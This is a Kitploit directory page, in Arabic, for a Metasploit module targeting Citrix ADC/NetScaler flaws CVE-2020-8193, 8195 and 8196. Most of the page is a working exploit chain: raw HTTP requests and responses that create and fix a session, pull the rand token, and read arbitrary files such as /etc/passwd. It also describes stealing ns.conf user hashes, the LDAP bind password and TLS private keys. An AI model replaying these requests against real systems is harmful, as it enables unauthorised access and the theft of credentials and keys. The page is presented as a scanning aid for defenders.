Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
citrix_adc_netscaler_lfi — يمكن استخدام وحدة Metasploit-Framework هذه لمساعدة الشركات في فحص آخر ثغرة Citrix CVE-2020-8193 و CVE-2020-8195 و CVE-2020-8196 (تم الكشف عنها في 08 يوليو 2020). | Kitploit
أدوات/GitHubGitHub/zeop-cybersec/citrix_adc_netscaler_lfi
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubzeop-cybersec/citrix_adc_netscaler_lfi

citrix_adc_netscaler_lfi

يمكن استخدام وحدة Metasploit-Framework هذه لمساعدة الشركات في فحص آخر ثغرة Citrix CVE-2020-8193 و CVE-2020-8195 و CVE-2020-8196 (تم الكشف عنها في 08 يوليو 2020).

عرض المستودع
643منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

citrix_adc_netscaler_lfi_scan

alt text

يمكن استخدام وحدة Metasploit-Framework هذه لمساعدة الشركات في التحقق من آخر الثغرات الأمنية لـ Citrix (التي تم الكشف عنها في 8 يوليو 2020).

  • CVE-2020-8193
  • CVE-2020-8195
  • CVE-2020-8196

نشر عام في 8 يوليو 2020 بواسطة Donny Maasland ناقش كيفية استغلال الثغرة.

اعتبارًا من 10 يوليو، أكدت RIFT أن هذه الثغرة يمكن استخدامها لاستخراج جلسات VPN صالحة من مثيل ضعيف.

اقرأ المزيد من تويتر:

  • Citrix تصدر تصحيحات حرجة لـ 11 ثغرة جديدة تؤثر على منتجات متعددة
  • المخترقون يفحصون بنشاط ويحاولون باستمرار استغلال ثغرات Citrix ADC

الطلبات

0x1 create_session (بدء)

أولاً، تحتاج إلى الحصول على معرف الجلسة.

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-NITRO-USER: LCGSfX
X-NITRO-PASS: fYiZon
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:23 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x2 fix_session_rand

ثم، تحتاج إلى إصلاح الجلسة. يمكنك الاستفادة من هذه الخطوة للحصول على قيمة rand (وتوفير طلب إضافي إلى /menu/stc).

root@kitploit:~
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close
root@kitploit:~
HTTP/1.1 302 Found
Date: Tue, 14 Jul 2020 09:13:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=0; expires=Fri, 09-Jul-2021 09:13:27 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
X-XSS-Protection: 1; mode=block
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

تحتاج إلى متابعة إعادة التوجيه.

root@kitploit:~
GET /menu/neo HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close

واحصل على قيمة rand من نص الاستجابة.

root@kitploit:~
HTTP/1.1 200 OK
Date: Tue, 14 Jul 2020 09:13:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: startupapp=neo; expires=Fri, 09-Jul-2021 09:13:30 GMT; Max-Age=31104000; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 1590
Connection: close
Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Configuration</title>
<script type="text/javascript">var neo_logout_url = "/menu/lo?rand=478257144.1894793017920341";</script>
<script type="text/javascript">var neo_machine_sysid = "450092";var rand = "478257144.1894793017920341";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script>
<script type="text/javascript">var global_data = "{global_data}";</script>
<link href="/admin_ui/rdx/core/css/rdx.css" rel="stylesheet" type="text/css"/>
<link href="/admin_ui/neo/css/neo.css" rel="stylesheet" type="text/css"/>
<!--[if IE]> <style type="text/css"> .form td input[type="submit"] { width: 50px; } </style> <![endif]-->
<script type="text/javascript" src="/admin_ui/rdx/core/js/rdx.js"></script>
<script type="text/javascript" src="/menu/branding"></script>
<script type="text/javascript" src="/menu/neoglobaldata"></script>
<script type="text/javascript" src="/menu/neoa?gui_token=478257144.1894793017920341"></script>
<script type="text/javascript" src="/admin_ui/neo/js/neo.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_win.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_mac.js"></script>
</head>
<body class="ns_body">
</body>
</html>

0x3 create_session (كسر)

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: PjdFbLCc
X-NITRO-PASS: xyFoLmXD
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x4 read_lfi

root@kitploit:~
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: UGjkHm
X-NITRO-PASS: NbIEBHxw
rand_key: 478257144.1894793017920341
Content-Type: application/xml
Content-Length: 31
Connection: close

<clipermission></clipermission>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:37 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="passwd"
Accept-Ranges: bytes
Content-Length: 465
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/octet-stream

root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin

تطوير الاستغلال والتأثير

يمكن للمهاجم استغلال هذه الثغرة للحصول على معلومات حساسة على أنظمة Citrix الضعيفة.

نظرة عامة صغيرة على ما لاحظناه على Citrix Netscaler 12.1 build 55.18.

  • إمكانية قراءة /nsconfig/ns.conf:

هذا هو ملف التهيئة لـ Netscaler. يحتوي على تجزئات (hashes) المستخدمين المصرح لهم بالاتصال بـ Netscaler عبر SSH (بما في ذلك المستخدم nsroot). يحتوي هذا الملف أيضاً على معلومات أخرى مثل تلك المستخدمة لربط Active Directory (على سبيل المثال).

بعض المخرجات المثيرة للاهتمام:

root@kitploit:~
set system user nsroot 35b7a39540c7f42a4c85455a750fed309e506d6d83fcaae83 -encrypted -hashmethod SHA1
add authentication ldapAction 192.168.7.3_LDAP -serverIP 192.168.7.3 -serverPort 636 -ldapBase "DC=prod,DC=contoso,DC=com" -ldapBindDn [email protected] -ldapBindDnPassword 36e2fd1867ca398c68f45c7c54dfa56988c3464ff2a3acf48887091292fb58f5 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName
add ssl certKey ns-server-certificate -cert ns-server.cert -key ns-server.key

alt text

  • إمكانية قراءة /nsconfig/ssl/ns-server.key (وجميع ملفات الشهادات الأخرى):

إنه مفتاح شهادة TLS.

alt text

  • القدرة على سرد محتويات المجلد /var/nstmp:

ليس من الشائع عموماً سرد المجلدات من ثغرة LFI. يمكن للمهاجم استخدام ذلك لـ "إيجاد طريقه" في نظام الملفات. يحتوي المجلد /var/nstmp على قائمة الجلسات النشطة.

alt text

الأنظمة الضعيفة

CVE-2020-8193: تحكم وصول غير مناسب في Citrix ADC و Citrix Gateway الإصدارات قبل 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 و 10.5-70.18 و Citrix SDWAN WAN-OP الإصدارات قبل 11.1.1a, 11.0.3d و 10.2.7 مما يؤدي إلى وصول غير مصادق عليه إلى نقاط نهاية URL معينة.

خطورة ومقاييس CVSS 3.x:

  • النتيجة الأساسية: 6.5 (متوسطة)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE-2020-8195: تحقق غير مناسب من المدخلات في Citrix ADC و Citrix Gateway الإصدارات قبل 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 و 10.5-70.18 و Citrix SDWAN WAN-OP الإصدارات قبل 11.1.1a, 11.0.3d و 10.2.7 مما يؤدي إلى كشف محدود للمعلومات للمستخدمين ذوي الامتيازات المنخفضة.

خطورة ومقاييس CVSS 3.x:

  • النتيجة الأساسية: 6.5 (متوسطة)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2020-8196: تحكم وصول غير مناسب في Citrix ADC و Citrix Gateway الإصدارات قبل 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 و 10.5-70.18 و Citrix SDWAN WAN-OP الإصدارات قبل 11.1.1a, 11.0.3d و 10.2.7 مما يؤدي إلى كشف محدود للمعلومات للمستخدمين ذوي الامتيازات المنخفضة.

خطورة ومقاييس CVSS 3.x:

  • النتيجة الأساسية: 4.3 (متوسطة)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
تنزيل الأداة